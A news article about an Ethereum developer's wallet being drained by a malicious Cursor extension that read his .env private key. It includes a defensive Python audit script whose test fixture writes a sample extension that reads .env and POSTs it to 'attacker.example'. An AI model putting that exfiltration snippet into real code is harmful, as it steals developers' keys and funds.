Ethereum Core Developer’s Wallet Drained by Malicious AI Extension, Exposing New Attack Vector

Veteran Ethereum Developer Falls Victim to Wallet Drainer

A seasoned Ethereum core developer has become the latest target of a wallet drainer attack, a reminder that years of experience do not protect against a malicious development tool installed in a hurry.


On Tuesday, developer Zak Cole revealed on X that his funds were stolen after he unknowingly installed a malicious extension named contractshark.solidity-lang in Cursor, the AI-focused editor derived from VS Code. The extension had a polished listing and over 54,000 downloads; neither is a trust signal, since both are easy for a publisher to manufacture. Once installed, it covertly read his private key and transmitted it to an attacker-controlled server.


[Image: Cole's post on X. Source: Zak.eth]


How the Attack Unfolded

Cole explained that the plugin read his .env file, which stored sensitive information including his Ethereum wallet private key. The attacker then held the key for three days before draining the hot wallet on August 10, a dwell time that shows the theft of the key and the theft of the funds can be well separated, so a drained wallet is not the first moment of compromise.


Fortunately, the loss was limited to a "few hundred" dollars' worth of Ether (ETH), which was trading at around $4,698 at the time, because Cole uses small, project-specific hot wallets for testing. His primary holdings remain secure on hardware wallets.


“In over a decade, I’ve never lost a single wei to hackers. Then I rushed to ship a contract last week,” Cole said, calling the incident a hard reminder about security hygiene.


[Image caption, belonging to the WalletConnect case below: Some of the fake reviews on the spoofed WalletConnect app mentioned features that had nothing to do with crypto. Source: Check Point Research]


Extensions: The Rising Attack Vector in Crypto Development

The case underscores a growing concern in the blockchain industry: malicious Visual Studio Code (VS Code) and Cursor extensions used as a vector for stealing private keys. An editor extension runs with the full privileges of the editor process, so it can read any file the developer can, including every .env file in the workspace, and can make outbound network connections without any prompt.


Hakan Unal, senior security operations lead at Cyvers, warned that attackers are increasingly using fake publishers and typosquatting (names one character away from a legitimate extension) to distribute harmful plugins. His security advice for developers includes:


  • Thoroughly vetting extensions before installation


  • Avoiding storage of private keys in plain text or .env files


  • Using hardware wallets for asset storage


  • Developing in isolated environments
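The two checks a practitioner can actually automate from the list above, and from the attack described earlier (an extension that reads .env and sends its contents out), are: is there key material sitting in plaintext in a .env file, and does any installed extension both read dotenv files and make outbound network calls? The script below is an added example written for this article, not code from Cole, Cyvers, or any vendor. The extension directory layout, the fake extension names, the dummy key and the regex heuristics are all assumptions; the fixture it scans is constructed inline so it runs offline, and real extensions will need the paths adjusted (for example ~/.cursor/extensions or ~/.vscode/extensions).

```python
"""Audit helper: flag plaintext key material in .env files and editor
extensions whose JavaScript both reads dotenv files and talks to the network.
Added example for this article; stdlib only; paths and names are assumptions."""
import json
import os
import re
import tempfile
from pathlib import Path

# A secp256k1 private key is 32 bytes: 64 hex characters, optionally 0x-prefixed.
PRIVKEY_RE = re.compile(r"(?:0x)?[0-9a-fA-F]{64}")
# Heuristics over extension source: dotenv reads and outbound network primitives.
ENV_READ_RE = re.compile(r"""readFile(?:Sync)?\s*\([^)]*\.env|dotenv|['"]\.env['"]""")
NET_CALL_RE = re.compile(r"\b(?:https?\.request|fetch|axios|XMLHttpRequest|WebSocket)\b")


def looks_like_mnemonic(value):
    """Loose BIP-39 check: 12 or 24 lowercase words. Good enough to flag for review."""
    words = value.split()
    return len(words) in (12, 24) and all(w.isalpha() and w.islower() for w in words)


def scan_env_file(path):
    """Return the variable names in a .env-style file whose value looks like a key."""
    findings = []
    for line in Path(path).read_text(errors="replace").splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        name, _, value = line.partition("=")
        value = value.strip().strip("'\"")
        if PRIVKEY_RE.fullmatch(value) or looks_like_mnemonic(value):
            findings.append(name.strip())
    return findings


def find_env_files(root):
    """Yield every .env / .env.* file under root, skipping node_modules."""
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != "node_modules"]
        for f in filenames:
            if f == ".env" or f.startswith(".env."):
                yield Path(dirpath) / f


def scan_extension(ext_dir):
    """Inspect one installed extension directory; return (publisher.name, reasons)."""
    ext_dir = Path(ext_dir)
    ident = "unknown"
    manifest = ext_dir / "package.json"
    if manifest.is_file():
        try:
            pkg = json.loads(manifest.read_text(errors="replace"))
            ident = f"{pkg.get('publisher', '?')}.{pkg.get('name', '?')}"
        except json.JSONDecodeError:
            pass
    reads_env = makes_net = False
    for js in ext_dir.rglob("*.js"):
        if "node_modules" in js.parts:
            continue
        src = js.read_text(errors="replace")
        reads_env |= bool(ENV_READ_RE.search(src))
        makes_net |= bool(NET_CALL_RE.search(src))
    reasons = []
    if reads_env:
        reasons.append("reads .env")
    if makes_net:
        reasons.append("outbound network")
    return ident, reasons


def audit(project_root, extensions_root):
    """Run both checks. An extension is risky when it reads .env AND talks out."""
    report = {"plaintext_keys": {}, "risky_extensions": {}}
    for env in find_env_files(project_root):
        hits = scan_env_file(env)
        if hits:
            report["plaintext_keys"][str(env)] = hits
    ext_root = Path(extensions_root)
    if ext_root.is_dir():
        for d in ext_root.iterdir():
            if d.is_dir():
                ident, reasons = scan_extension(d)
                if len(reasons) == 2:
                    report["risky_extensions"][ident] = reasons
    return report


def build_fixture(base):
    """Constructed sample data (assumption, not real malware): a project .env with a
    dummy key, one fake extension that reads .env and POSTs it, one benign one."""
    base = Path(base)
    proj = base / "project"
    proj.mkdir(parents=True)
    (proj / ".env").write_text("RPC_URL=https://rpc.example\nPRIVATE_KEY=0x" + "ab" * 32 + "\n")
    evil = base / "extensions" / "evilpub.solidity-helper-1.0.0"
    evil.mkdir(parents=True)
    (evil / "package.json").write_text(json.dumps({"publisher": "evilpub", "name": "solidity-helper"}))
    (evil / "extension.js").write_text(
        "const fs=require('fs');const https=require('https');\n"
        "const env=fs.readFileSync('.env','utf8');\n"
        "https.request({host:'attacker.example',method:'POST'}).end(env);\n")
    good = base / "extensions" / "goodpub.formatter-2.0.0"
    good.mkdir()
    (good / "package.json").write_text(json.dumps({"publisher": "goodpub", "name": "formatter"}))
    (good / "extension.js").write_text("module.exports={activate(){}}\n")
    return proj, base / "extensions"


def demo():
    """Build the constructed fixture in a scratch directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        proj, exts = build_fixture(tmp)
        return audit(proj, exts)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The heuristics are deliberately coarse: plenty of legitimate extensions read .env (dotenv tooling) or make network calls (language servers, telemetry), so a hit means "open the source and look", not "malware". The point is that both behaviours together, in an extension you did not audit, are exactly the profile of the incident above, and that a key which the scanner can find in a .env file is a key every installed extension can find too.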


The Wallet Drainer-as-a-Service Trend

The attack on Cole is part of a broader surge in wallet drainer malware: tooling built specifically to obtain a victim's key or signing authority and then move the holdings out before the victim notices.


In September 2024, a fake WalletConnect Protocol app on the Google Play Store was found to have stolen more than $70,000 in assets after remaining available for over five months.


The threat is growing more accessible, too. An April 22 report by AMLBot revealed that wallet drainer kits are being sold under a software-as-a-service (SaaS) model, allowing scammers to rent them for as little as 100 USDT (roughly $100).


[Image: crypto drainers report. Source: AMLBot]


Source: https://x.com/SALISU_AUWAL99/status/1941844961860735347


Conclusion

Cole's experience highlights an urgent reality for crypto builders: the tools they trust to accelerate development can become the attacker's entry point. With editor extensions now an established attack vector, vetting what gets installed, keeping signing keys out of plaintext files in the workspace, developing in isolated environments, and holding real value on hardware wallets are more important than ever.

